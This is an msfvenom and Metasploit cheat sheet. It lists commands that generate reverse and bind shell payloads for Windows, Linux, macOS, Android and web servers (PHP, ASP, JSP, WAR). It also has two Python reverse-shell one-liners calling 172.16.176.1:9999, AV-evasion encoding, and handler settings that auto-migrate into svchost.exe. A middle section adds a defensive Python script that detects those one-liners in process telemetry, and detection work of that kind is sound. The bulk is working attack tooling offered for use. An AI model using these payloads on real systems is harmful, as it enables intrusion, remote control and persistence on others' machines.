List payloads: msfvenom --list payloads
List supported output formats: msfvenom --help-formats
Show the options a payload needs: msfvenom -p xxx --payload-options
Encoding options: -e x86/shikata_ga_nai -i 5 -b "\x00" // encode 5 times with the shikata_ga_nai encoder and exclude the null byte
Commonly used payloads
windows/shell_bind_tcp
windows/meterpreter/bind_tcp
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/meterpreter_reverse_tcp
System Payloads
linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f elf > shell.elf
windows
messagebox test
msfvenom -a x86 -p windows/messagebox TEXT="hello, it is a test"
Take care to pick the right 32-bit or 64-bit payload when generating for Windows.
msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe
Taking windows/meterpreter/reverse_tcp as an example: this payload is 32-bit by default, which can also be stated explicitly with the -a x86 option.
For a 64-bit payload use windows/x64/meterpreter/reverse_tcp instead.
Netcat
nc forward (bind) connection
msfvenom -p windows/shell_hidden_bind_tcp rhost=192.168.0.107 lport=8956 -f exe > 1.exe
nc reverse connection (listener side)
msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.107 lport=888 -f exe > 1.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=xxx LPORT=xxx -f macho > shell.macho
Android
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.apk
Web Payloads
php
msfvenom -p php/meterpreter_reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f asp > shell.asp
jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.jsp
war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f war > shell.war
python
msfvenom -p cmd/unix/reverse_python LHOST=xxx LPORT=xxx -f raw > shell.py
msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.py
Forward shell
python/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.176.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
python/python3 -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('172.16.176.1',9999))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
bash
msfvenom -p cmd/unix/reverse_bash LHOST=xxx LPORT=xxx -f raw > shell.sh
perl
msfvenom -p cmd/unix/reverse_perl LHOST=xxx LPORT=xxx -f raw > shell.pl
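As an added detection example (not part of these notes), the Python below scans process command lines, as a defender would pull them from auditd EXECVE or EDR telemetry, for the indicator combinations present in the two Python one-liners above (socket connect plus dup2 of stdio, or a recv/Popen loop) and extracts the remote endpoint for the alert. The rule names, the sample command lines and the benign lines are constructed for this example; 172.16.176.1:9999 is the endpoint from the one-liners above.

```python
import re
from typing import Dict, List, Optional

# Token sets taken from the two one-liners above; a command line must contain every token of a rule.
# Tokens are lowercase because classify() lowercases and strips whitespace before matching.
RULES: Dict[str, List[str]] = {
    "python-reverse-shell-dup2": ["socket", ".connect(", "os.dup2(", "subprocess"],
    "python-reverse-shell-popen-loop": ["socket", ".connect(", ".recv(", "subprocess.popen(", "shell=true"],
}
# Remote endpoint as written in the one-liners: s.connect(("host",port)) or s.connect(('host',port))
CONNECT_RE = re.compile(r"""\.connect\(\(\s*['"]([^'"]+)['"]\s*,\s*(\d+)\s*\)\)""")

# Constructed sample process command lines (not real captures): two flagged, three benign.
SAMPLE_CMDLINES = [
    """python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.176.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'""",
    r'''python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('172.16.176.1',9999))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"''',
    "python3 manage.py runserver 0.0.0.0:8000",
    "python3 -c 'import socket; print(socket.gethostname())'",
    'python3 -c \'import socket;s=socket.socket();s.connect(("10.0.0.5",443));print(s.getpeername())\'',
]


def classify(cmdline: str) -> Optional[str]:
    """Return the first matching rule name, or None when no full indicator set is present."""
    # Strip all whitespace so 'subprocess . Popen' style spacing does not evade the tokens.
    norm = re.sub(r"\s+", "", cmdline).lower()
    for label, tokens in RULES.items():
        if all(tok in norm for tok in tokens):
            return label
    return None


def remote_endpoint(cmdline: str) -> Optional[str]:
    """Pull the host:port the one-liner connects to, for the alert and for egress review."""
    m = CONNECT_RE.search(cmdline)
    return f"{m.group(1)}:{m.group(2)}" if m else None


def scan(cmdlines: List[str]) -> List[dict]:
    """One alert record per flagged command line; lines matching no rule produce nothing."""
    return [
        {"index": i, "rule": classify(c), "remote": remote_endpoint(c)}
        for i, c in enumerate(cmdlines) if classify(c)
    ]


if __name__ == "__main__":
    for hit in scan(SAMPLE_CMDLINES):
        print(hit)
```

A plain socket connect (last sample) is not flagged on its own; only the combination with stdio redirection or a command-execution loop triggers a rule.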
MSF listener
use exploit/multi/handler
set PAYLOAD
set RHOST
set RPORT
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
Other settings
AutoRunScript: run a script automatically once a session opens
e.g. run the post/windows/manage/migrate module automatically to migrate into another process
set AutoRunScript post/windows/manage/migrate
Automatic process migration
set prependmigrate true
set prependmigrateProc svchost.exe
Auxiliary settings
set exitonsession false // keeps the listening port open after a session is established so that multiple sessions can be accepted
set stagerverifysslcert false // prevents the SSL_accept error that can occur when obtaining a shell